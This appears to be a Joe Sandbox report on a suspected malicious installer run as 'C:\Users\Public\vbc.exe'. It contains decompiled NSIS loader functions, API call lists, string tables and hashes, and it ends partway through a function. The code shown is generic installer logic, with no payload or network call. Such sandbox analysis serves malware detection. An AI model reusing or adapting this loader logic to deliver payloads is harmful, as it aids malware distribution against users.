                                                					_t76 = 0x423728;
                                                					L"1033" = 0x30;
                                                					 *0x437002 = 0x78;
                                                					 *0x437004 = 0;
                                                					E004060DF(0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423728, 0);
                                                					__eflags =  *0x423728;
                                                					if(__eflags == 0) {
                                                						E004060DF(0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423728, 0);
                                                					}
                                                					lstrcatW(L"1033", _t76);
                                                				} else {
                                                					E00406159(L"1033",  *_t22() & 0x0000ffff);
                                                				}
                                                				E00403D31(_t78, _t90);
                                                				_t86 = L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93";
                                                				 *0x42a2c0 =  *0x42a258 & 0x00000020;
                                                				 *0x42a2dc = 0x10000;
                                                				if(E00405CCE(_t90, L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93") != 0) {
                                                					L16:
                                                					if(E00405CCE(_t98, _t86) == 0) {
                                                						E00406234(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
                                                					}
                                                					_t30 = LoadImageW( *0x42a240, 0x67, 1, 0, 0, 0x8040);
                                                					 *0x429228 = _t30;
                                                					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                						L21:
                                                						if(E0040140B(0) == 0) {
                                                							_t32 = E00403D31(_t78, __eflags);
                                                							__eflags =  *0x42a2e0;
                                                							if( *0x42a2e0 != 0) {
                                                								_t33 = E00405444(_t32, 0);
                                                								__eflags = _t33;
                                                								if(_t33 == 0) {
                                                									E0040140B(1);
                                                									goto L33;
                                                								}
                                                								__eflags =  *0x42920c;
                                                								if( *0x42920c == 0) {
                                                									E0040140B(2);
                                                								}
                                                								goto L22;
                                                							}
                                                							ShowWindow( *0x423708, 5); // executed
                                                							_t39 = E0040657C("RichEd20"); // executed
                                                							__eflags = _t39;
                                                							if(_t39 == 0) {
                                                								E0040657C("RichEd32");
                                                							}
                                                							_t87 = L"RichEdit20W";
                                                							_t40 = GetClassInfoW(0, _t87, 0x4291e0);
                                                							__eflags = _t40;
                                                							if(_t40 == 0) {
                                                								GetClassInfoW(0, L"RichEdit", 0x4291e0);
                                                								 *0x429204 = _t87;
                                                								RegisterClassW(0x4291e0);
                                                							}
                                                							_t44 = DialogBoxParamW( *0x42a240,  *0x429220 + 0x00000069 & 0x0000ffff, 0, E00403DFE, 0); // executed
                                                							E004039AB(E0040140B(5), 1);
                                                							return _t44;
                                                						}
                                                						L22:
                                                						_t36 = 2;
                                                						return _t36;
                                                					} else {
                                                						_t78 =  *0x42a240;
                                                						 *0x4291e4 = E00401000;
                                                						 *0x4291f0 =  *0x42a240;
                                                						 *0x4291f4 = _t30;
                                                						 *0x429204 = 0x40a3b4;
                                                						if(RegisterClassW(0x4291e0) == 0) {
                                                							L33:
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                						 *0x423708 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a240, 0);
                                                						goto L21;
                                                					}
                                                				} else {
                                                					_t78 =  *(_t82 + 0x48);
                                                					if( *(_t82 + 0x48) == 0) {
                                                						goto L16;
                                                					}
                                                					_t76 = 0x4281e0;
                                                					E004060DF( *((intOrPtr*)(_t82 + 0x44)),  *0x42a278 + _t78 * 2,  *0x42a278 +  *(_t82 + 0x4c) * 2, 0x4281e0, 0);
                                                					_t63 =  *0x4281e0; // 0x43
                                                					if(_t63 == 0) {
                                                						goto L16;
                                                					}
                                                					if(_t63 == 0x22) {
                                                						_t76 = 0x4281e2;
                                                						 *((short*)(E00405BF3(0x4281e2, 0x22))) = 0;
                                                					}
                                                					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                						L15:
                                                						E00406212(_t86, E00405BC6(_t76));
                                                						goto L16;
                                                					} else {
                                                						_t69 = GetFileAttributesW(_t76);
                                                						if(_t69 == 0xffffffff) {
                                                							L14:
                                                							E00405C12(_t76);
                                                							goto L15;
                                                						}
                                                						_t98 = _t69 & 0x00000010;
                                                						if((_t69 & 0x00000010) != 0) {
                                                							goto L15;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                			}
























                                                0x00403a61
                                                0x00403a6a
                                                0x00403a71
                                                0x00403a73
                                                0x00403a87
                                                0x00403a99
                                                0x00403aa2
                                                0x00403aab
                                                0x00403ab2
                                                0x00403ab7
                                                0x00403abe
                                                0x00403ad1
                                                0x00403ad1
                                                0x00403adc
                                                0x00403a75
                                                0x00403a80
                                                0x00403a80
                                                0x00403ae1
                                                0x00403aeb
                                                0x00403af4
                                                0x00403af9
                                                0x00403b0a
                                                0x00403b9c
                                                0x00403ba4
                                                0x00403bad
                                                0x00403bad
                                                0x00403bc3
                                                0x00403bc9
                                                0x00403bd7
                                                0x00403c58
                                                0x00403c60
                                                0x00403c6a
                                                0x00403c6f
                                                0x00403c75
                                                0x00403cff
                                                0x00403d04
                                                0x00403d06
                                                0x00403d22
                                                0x00000000
                                                0x00403d22
                                                0x00403d08
                                                0x00403d0e
                                                0x00403d16
                                                0x00403d16
                                                0x00000000
                                                0x00403d0e
                                                0x00403c83
                                                0x00403c8e
                                                0x00403c93
                                                0x00403c95
                                                0x00403c9c
                                                0x00403c9c
                                                0x00403ca7
                                                0x00403caf
                                                0x00403cb1
                                                0x00403cb3
                                                0x00403cbc
                                                0x00403cbf
                                                0x00403cc5
                                                0x00403cc5
                                                0x00403ce4
                                                0x00403cf5
                                                0x00000000
                                                0x00403cfa
                                                0x00403c62
                                                0x00403c64
                                                0x00000000
                                                0x00403bd9
                                                0x00403bd9
                                                0x00403be5
                                                0x00403bef
                                                0x00403bf5
                                                0x00403bfa
                                                0x00403c09
                                                0x00403d27
                                                0x00403d27
                                                0x00000000
                                                0x00403d27
                                                0x00403c18
                                                0x00403c53
                                                0x00000000
                                                0x00403c53
                                                0x00403b10
                                                0x00403b10
                                                0x00403b15
                                                0x00000000
                                                0x00000000
                                                0x00403b23
                                                0x00403b35
                                                0x00403b3a
                                                0x00403b43
                                                0x00000000
                                                0x00000000
                                                0x00403b49
                                                0x00403b4b
                                                0x00403b58
                                                0x00403b58
                                                0x00403b61
                                                0x00403b67
                                                0x00403b8f
                                                0x00403b97
                                                0x00000000
                                                0x00403b79
                                                0x00403b7a
                                                0x00403b83
                                                0x00403b89
                                                0x00403b8a
                                                0x00000000
                                                0x00403b8a
                                                0x00403b85
                                                0x00403b87
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403b87
                                                0x00403b67

                                                APIs
                                                  • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                  • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                • lstrcatW.KERNEL32 ref: 00403ADC
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,7556D4C4), ref: 00403B5C
                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403B6F
                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403B7A
                                                • LoadImageW.USER32 ref: 00403BC3
                                                  • Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166
                                                • RegisterClassW.USER32 ref: 00403C00
                                                • SystemParametersInfoW.USER32 ref: 00403C18
                                                • CreateWindowExW.USER32 ref: 00403C4D
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403C83
                                                • GetClassInfoW.USER32 ref: 00403CAF
                                                • GetClassInfoW.USER32 ref: 00403CBC
                                                • RegisterClassW.USER32 ref: 00403CC5
                                                • DialogBoxParamW.USER32 ref: 00403CE4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\Public\vbc.exe" $(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 1975747703-2761441429
                                                • Opcode ID: 0ee41304b45ea222ab407853068b800f5013aa7f596612d197709f65786b57e8
                                                • Instruction ID: a49deb01357f173a4aad96dc60f9d02752f373419f451c4cfac2514e29acbaba
                                                • Opcode Fuzzy Hash: 0ee41304b45ea222ab407853068b800f5013aa7f596612d197709f65786b57e8
                                                • Instruction Fuzzy Hash: ED61C370240300BAD620AF669D45E2B3A7CEB84749F40457EF941B22E2DB7D9D52CA2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 432 402ed5-402f23 GetTickCount GetModuleFileNameW call 405de7 435 402f25-402f2a 432->435 436 402f2f-402f5d call 406212 call 405c12 call 406212 GetFileSize 432->436 437 403174-403178 435->437 444 402f63-402f7a 436->444 445 40304d-40305b call 402e33 436->445 447 402f7c 444->447 448 402f7e-402f8b call 4033ec 444->448 451 403061-403064 445->451 452 40312c-403131 445->452 447->448 456 402f91-402f97 448->456 457 4030e8-4030f0 call 402e33 448->457 454 403090-4030dc GlobalAlloc call 40670b call 405e16 CreateFileW 451->454 455 403066-40307e call 403402 call 4033ec 451->455 452->437 481 4030f2-403122 call 403402 call 40317b 454->481 482 4030de-4030e3 454->482 455->452 484 403084-40308a 455->484 461 403017-40301b 456->461 462 402f99-402fb1 call 405da2 456->462 457->452 467 403024-40302a 461->467 468 40301d-403023 call 402e33 461->468 462->467 477 402fb3-402fba 462->477 469 40302c-40303a call 40669d 467->469 470 40303d-403047 467->470 468->467 469->470 470->444 470->445 477->467 483 402fbc-402fc3 477->483 492 403127-40312a 481->492 482->437 483->467 485 402fc5-402fcc 483->485 484->452 484->454 485->467 487 402fce-402fd5 485->487 487->467 489 402fd7-402ff7 487->489 489->452 491 402ffd-403001 489->491 493 403003-403007 491->493 494 403009-403011 491->494 492->452 495 403133-403144 492->495 493->445 493->494 494->467 496 403013-403015 494->496 497 403146 495->497 498 40314c-403151 495->498 496->467 497->498 499 403152-403158 498->499 499->499 500 40315a-403172 call 405da2 499->500 500->437
                                                C-Code - Quality: 99%
                                                			E00402ED5(void* __eflags, signed int _a4) {
                                                				long _v8;
                                                				long _v12;
                                                				intOrPtr _v16;
                                                				long _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				signed int _v40;
                                                				short _v560;
                                                				signed int _t54;
                                                				void* _t57;
                                                				void* _t62;
                                                				intOrPtr _t65;
                                                				void* _t68;
                                                				intOrPtr* _t70;
                                                				intOrPtr _t71;
                                                				signed int _t77;
                                                				signed int _t82;
                                                				signed int _t83;
                                                				signed int _t89;
                                                				intOrPtr _t92;
                                                				signed int _t101;
                                                				signed int _t103;
                                                				void* _t105;
                                                				signed int _t106;
                                                				signed int _t109;
                                                				void* _t110;
                                                
                                                				_v8 = 0;
                                                				_v12 = 0;
                                                				 *0x42a24c = GetTickCount() + 0x3e8;
                                                				GetModuleFileNameW(0, 0x438800, 0x400);
                                                				_t105 = E00405DE7(0x438800, 0x80000000, 3);
                                                				 *0x40a018 = _t105;
                                                				if(_t105 == 0xffffffff) {
                                                					return L"Error launching installer";
                                                				}
                                                				E00406212(L"C:\\Users\\Public", 0x438800);
                                                				E00406212(0x439000, E00405C12(L"C:\\Users\\Public"));
                                                				_t54 = GetFileSize(_t105, 0);
                                                				__eflags = _t54;
                                                				 *0x418ee0 = _t54;
                                                				_t109 = _t54;
                                                				if(_t54 <= 0) {
                                                					L22:
                                                					E00402E33(1);
                                                					__eflags =  *0x42a254;
                                                					if( *0x42a254 == 0) {
                                                						goto L30;
                                                					}
                                                					__eflags = _v12;
                                                					if(_v12 == 0) {
                                                						L26:
                                                						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                						_t110 = _t57;
                                                						E0040670B(0x40ce48);
                                                						E00405E16(0x40ce48,  &_v560, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
                                                						_t62 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                						__eflags = _t62 - 0xffffffff;
                                                						 *0x40a01c = _t62;
                                                						if(_t62 != 0xffffffff) {
                                                							_t65 = E00403402( *0x42a254 + 0x1c);
                                                							 *0x418ee4 = _t65;
                                                							 *0x418ed8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                							_t68 = E0040317B(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                                							__eflags = _t68 - _v20;
                                                							if(_t68 == _v20) {
                                                								__eflags = _v40 & 0x00000001;
                                                								 *0x42a250 = _t110;
                                                								 *0x42a258 =  *_t110;
                                                								if((_v40 & 0x00000001) != 0) {
                                                									 *0x42a25c =  *0x42a25c + 1;
                                                									__eflags =  *0x42a25c;
                                                								}
                                                								_t45 = _t110 + 0x44; // 0x44
                                                								_t70 = _t45;
                                                								_t101 = 8;
                                                								do {
                                                									_t70 = _t70 - 8;
                                                									 *_t70 =  *_t70 + _t110;
                                                									_t101 = _t101 - 1;
                                                									__eflags = _t101;
                                                								} while (_t101 != 0);
                                                								_t71 =  *0x418ed4; // 0x955a
                                                								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                                                								E00405DA2(0x42a260, _t110 + 4, 0x40);
                                                								__eflags = 0;
                                                								return 0;
                                                							}
                                                							goto L30;
                                                						}
                                                						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                					}
                                                					E00403402( *0x418ed0);
                                                					_t77 = E004033EC( &_a4, 4);
                                                					__eflags = _t77;
                                                					if(_t77 == 0) {
                                                						goto L30;
                                                					}
                                                					__eflags = _v8 - _a4;
                                                					if(_v8 != _a4) {
                                                						goto L30;
                                                					}
                                                					goto L26;
                                                				} else {
                                                					do {
                                                						_t106 = _t109;
                                                						asm("sbb eax, eax");
                                                						_t82 = ( ~( *0x42a254) & 0x00007e00) + 0x200;
                                                						__eflags = _t109 - _t82;
                                                						if(_t109 >= _t82) {
                                                							_t106 = _t82;
                                                						}
                                                						_t83 = E004033EC(0x418ee8, _t106);
                                                						__eflags = _t83;
                                                						if(_t83 == 0) {
                                                							E00402E33(1);
                                                							L30:
                                                							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                						}
                                                						__eflags =  *0x42a254;
                                                						if( *0x42a254 != 0) {
                                                							__eflags = _a4 & 0x00000002;
                                                							if((_a4 & 0x00000002) == 0) {
                                                								E00402E33(0);
                                                							}
                                                							goto L19;
                                                						}
                                                						E00405DA2( &_v40, 0x418ee8, 0x1c);
                                                						_t89 = _v40;
                                                						__eflags = _t89 & 0xfffffff0;
                                                						if((_t89 & 0xfffffff0) != 0) {
                                                							goto L19;
                                                						}
                                                						__eflags = _v36 - 0xdeadbeef;
                                                						if(_v36 != 0xdeadbeef) {
                                                							goto L19;
                                                						}
                                                						__eflags = _v24 - 0x74736e49;
                                                						if(_v24 != 0x74736e49) {
                                                							goto L19;
                                                						}
                                                						__eflags = _v28 - 0x74666f73;
                                                						if(_v28 != 0x74666f73) {
                                                							goto L19;
                                                						}
                                                						__eflags = _v32 - 0x6c6c754e;
                                                						if(_v32 != 0x6c6c754e) {
                                                							goto L19;
                                                						}
                                                						_a4 = _a4 | _t89;
                                                						_t103 =  *0x418ed0; // 0x17a74
                                                						 *0x42a2e0 =  *0x42a2e0 | _a4 & 0x00000002;
                                                						_t92 = _v16;
                                                						__eflags = _t92 - _t109;
                                                						 *0x42a254 = _t103;
                                                						if(_t92 > _t109) {
                                                							goto L30;
                                                						}
                                                						__eflags = _a4 & 0x00000008;
                                                						if((_a4 & 0x00000008) != 0) {
                                                							L15:
                                                							_v12 = _v12 + 1;
                                                							_t109 = _t92 - 4;
                                                							__eflags = _t106 - _t109;
                                                							if(_t106 > _t109) {
                                                								_t106 = _t109;
                                                							}
                                                							goto L19;
                                                						}
                                                						__eflags = _a4 & 0x00000004;
                                                						if((_a4 & 0x00000004) != 0) {
                                                							goto L22;
                                                						}
                                                						goto L15;
                                                						L19:
                                                						__eflags = _t109 -  *0x418ee0; // 0x1a4bd
                                                						if(__eflags < 0) {
                                                							_v8 = E0040669D(_v8, 0x418ee8, _t106);
                                                						}
                                                						 *0x418ed0 =  *0x418ed0 + _t106;
                                                						_t109 = _t109 - _t106;
                                                						__eflags = _t109;
                                                					} while (_t109 > 0);
                                                					goto L22;
                                                				}
                                                			}































                                                0x00402ee3
                                                0x00402ee6
                                                0x00402f00
                                                0x00402f05
                                                0x00402f18
                                                0x00402f1d
                                                0x00402f23
                                                0x00000000
                                                0x00402f25
                                                0x00402f36
                                                0x00402f47
                                                0x00402f4e
                                                0x00402f54
                                                0x00402f56
                                                0x00402f5b
                                                0x00402f5d
                                                0x0040304d
                                                0x0040304f
                                                0x00403054
                                                0x0040305b
                                                0x00000000
                                                0x00000000
                                                0x00403061
                                                0x00403064
                                                0x00403090
                                                0x00403095
                                                0x004030a0
                                                0x004030a2
                                                0x004030b3
                                                0x004030ce
                                                0x004030d4
                                                0x004030d7
                                                0x004030dc
                                                0x004030fb
                                                0x0040310b
                                                0x0040311d
                                                0x00403122
                                                0x00403127
                                                0x0040312a
                                                0x00403133
                                                0x00403137
                                                0x0040313f
                                                0x00403144
                                                0x00403146
                                                0x00403146
                                                0x00403146
                                                0x0040314e
                                                0x0040314e
                                                0x00403151
                                                0x00403152
                                                0x00403152
                                                0x00403155
                                                0x00403157
                                                0x00403157
                                                0x00403157
                                                0x0040315a
                                                0x00403161
                                                0x0040316d
                                                0x00403172
                                                0x00000000
                                                0x00403172
                                                0x00000000
                                                0x0040312a
                                                0x00000000
                                                0x004030de
                                                0x0040306c
                                                0x00403077
                                                0x0040307c
                                                0x0040307e
                                                0x00000000
                                                0x00000000
                                                0x00403087
                                                0x0040308a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402f63
                                                0x00402f63
                                                0x00402f68
                                                0x00402f6c
                                                0x00402f73
                                                0x00402f78
                                                0x00402f7a
                                                0x00402f7c
                                                0x00402f7c
                                                0x00402f84
                                                0x00402f89
                                                0x00402f8b
                                                0x004030ea
                                                0x0040312c
                                                0x00000000
                                                0x0040312c
                                                0x00402f91
                                                0x00402f97
                                                0x00403017
                                                0x0040301b
                                                0x0040301e
                                                0x00403023
                                                0x00000000
                                                0x0040301b
                                                0x00402fa4
                                                0x00402fa9
                                                0x00402fac
                                                0x00402fb1
                                                0x00000000
                                                0x00000000
                                                0x00402fb3
                                                0x00402fba
                                                0x00000000
                                                0x00000000
                                                0x00402fbc
                                                0x00402fc3
                                                0x00000000
                                                0x00000000
                                                0x00402fc5
                                                0x00402fcc
                                                0x00000000
                                                0x00000000
                                                0x00402fce
                                                0x00402fd5
                                                0x00000000
                                                0x00000000
                                                0x00402fd7
                                                0x00402fdd
                                                0x00402fe6
                                                0x00402fec
                                                0x00402fef
                                                0x00402ff1
                                                0x00402ff7
                                                0x00000000
                                                0x00000000
                                                0x00402ffd
                                                0x00403001
                                                0x00403009
                                                0x00403009
                                                0x0040300c
                                                0x0040300f
                                                0x00403011
                                                0x00403013
                                                0x00403013
                                                0x00000000
                                                0x00403011
                                                0x00403003
                                                0x00403007
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403024
                                                0x00403024
                                                0x0040302a
                                                0x0040303a
                                                0x0040303a
                                                0x0040303d
                                                0x00403043
                                                0x00403045
                                                0x00403045
                                                0x00000000
                                                0x00402f63

                                                APIs
                                                • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00402EE9
                                                • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F05
                                                  • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,00438800,80000000,00000003), ref: 00405DEB
                                                  • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\Public,C:\Users\Public,00438800,00438800,80000000,00000003), ref: 00402F4E
                                                • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403095
                                                Strings
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040312C
                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004030DE
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EDF, 004030AD
                                                • Inst, xrefs: 00402FBC
                                                • Null, xrefs: 00402FCE
                                                • Error launching installer, xrefs: 00402F25
                                                • "C:\Users\Public\vbc.exe" , xrefs: 00402ED5
                                                • C:\Users\Public, xrefs: 00402F30, 00402F35, 00402F3B
                                                • soft, xrefs: 00402FC5
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 2803837635-3987189858
                                                • Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                • Instruction ID: 3828440c67d76786f1e0e44594fc16ccb97003feb117245618602a5e37269db8
                                                • Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                • Instruction Fuzzy Hash: 5E61C271A01204ABDB20DF65DD85B9E7BB8EB04355F20417BFA00F62D1CB7C9A458B9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 503 406234-40623f 504 406241-406250 503->504 505 406252-406268 503->505 504->505 506 406480-406486 505->506 507 40626e-40627b 505->507 508 40648c-406497 506->508 509 40628d-40629a 506->509 507->506 510 406281-406288 507->510 511 4064a2-4064a3 508->511 512 406499-40649d call 406212 508->512 509->508 513 4062a0-4062ac 509->513 510->506 512->511 514 4062b2-4062ee 513->514 515 40646d 513->515 517 4062f4-4062ff GetVersion 514->517 518 40640e-406412 514->518 519 40647b-40647e 515->519 520 40646f-406479 515->520 521 406301-406305 517->521 522 406319 517->522 523 406414-406418 518->523 524 406447-40644b 518->524 519->506 520->506 521->522 525 406307-40630b 521->525 528 406320-406327 522->528 526 406428-406435 call 406212 523->526 527 40641a-406426 call 406159 523->527 529 40645a-40646b lstrlenW 524->529 530 40644d-406455 call 406234 524->530 525->522 531 40630d-406311 525->531 539 40643a-406443 526->539 527->539 534 406329-40632b 528->534 535 40632c-40632e 528->535 529->506 530->529 531->522 537 406313-406317 531->537 534->535 540 406330-40634d call 4060df 535->540 541 40636a-40636d 535->541 537->528 539->529 544 406445 539->544 550 406352-406356 540->550 542 40637d-406380 541->542 543 40636f-40637b GetSystemDirectoryW 541->543 547 406382-406390 GetWindowsDirectoryW 542->547 548 4063eb-4063ed 542->548 546 4063ef-4063f3 543->546 549 406406-40640c call 4064a6 544->549 546->549 552 4063f5-4063f9 546->552 547->548 548->546 551 406392-40639c 548->551 549->529 550->552 553 40635c-406365 call 406234 550->553 556 4063b6-4063cc SHGetSpecialFolderLocation 551->556 557 40639e-4063a1 551->557 552->549 558 4063fb-406401 lstrcatW 552->558 553->546 561 4063e7 556->561 562 4063ce-4063e5 SHGetPathFromIDListW CoTaskMemFree 556->562 557->556 560 4063a3-4063b4 SHGetFolderPathW 557->560 558->549 560->546 560->556 561->548 562->546 562->561
                                                C-Code - Quality: 74%
                                                			E00406234(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                				intOrPtr* _v8;
                                                				struct _ITEMIDLIST* _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _t48;
                                                				WCHAR* _t49;
                                                				signed char _t51;
                                                				signed int _t52;
                                                				signed int _t53;
                                                				signed int _t54;
                                                				short _t66;
                                                				short _t67;
                                                				short _t69;
                                                				short _t71;
                                                				void* _t81;
                                                				signed int _t85;
                                                				intOrPtr* _t89;
                                                				signed char _t90;
                                                				void* _t98;
                                                				void* _t108;
                                                				short _t109;
                                                				signed int _t112;
                                                				void* _t113;
                                                				WCHAR* _t114;
                                                				void* _t116;
                                                
                                                				_t113 = __esi;
                                                				_t108 = __edi;
                                                				_t81 = __ebx;
                                                				_t48 = _a8;
                                                				if(_t48 < 0) {
                                                					_t48 =  *( *0x42921c - 4 + _t48 * 4);
                                                				}
                                                				_push(_t81);
                                                				_push(_t113);
                                                				_push(_t108);
                                                				_t89 =  *0x42a278 + _t48 * 2;
                                                				_t49 = 0x4281e0;
                                                				_t114 = 0x4281e0;
                                                				if(_a4 >= 0x4281e0 && _a4 - 0x4281e0 >> 1 < 0x800) {
                                                					_t114 = _a4;
                                                					_a4 = _a4 & 0x00000000;
                                                				}
                                                				while(1) {
                                                					_t109 =  *_t89;
                                                					if(_t109 == 0) {
                                                						break;
                                                					}
                                                					__eflags = (_t114 - _t49 & 0xfffffffe) - 0x800;
                                                					if((_t114 - _t49 & 0xfffffffe) >= 0x800) {
                                                						break;
                                                					}
                                                					_t98 = 2;
                                                					_t89 = _t89 + _t98;
                                                					__eflags = _t109 - 4;
                                                					_v8 = _t89;
                                                					if(__eflags >= 0) {
                                                						if(__eflags != 0) {
                                                							 *_t114 = _t109;
                                                							_t114 = _t114 + _t98;
                                                							__eflags = _t114;
                                                						} else {
                                                							 *_t114 =  *_t89;
                                                							_t114 = _t114 + _t98;
                                                							_t89 = _t89 + _t98;
                                                						}
                                                						continue;
                                                					}
                                                					_t51 =  *((intOrPtr*)(_t89 + 1));
                                                					_t90 =  *_t89;
                                                					_v8 = _v8 + 2;
                                                					_t85 = _t90 & 0x000000ff;
                                                					_t52 = _t51 & 0x000000ff;
                                                					_a8 = (_t51 & 0x0000007f) << 0x00000007 | _t90 & 0x0000007f;
                                                					_v16 = _t52;
                                                					_t53 = _t52 | 0x00008000;
                                                					__eflags = _t109 - 2;
                                                					_v24 = _t85;
                                                					_v28 = _t85 | 0x00008000;
                                                					_v20 = _t53;
                                                					if(_t109 != 2) {
                                                						__eflags = _t109 - 3;
                                                						if(_t109 != 3) {
                                                							__eflags = _t109 - 1;
                                                							if(_t109 == 1) {
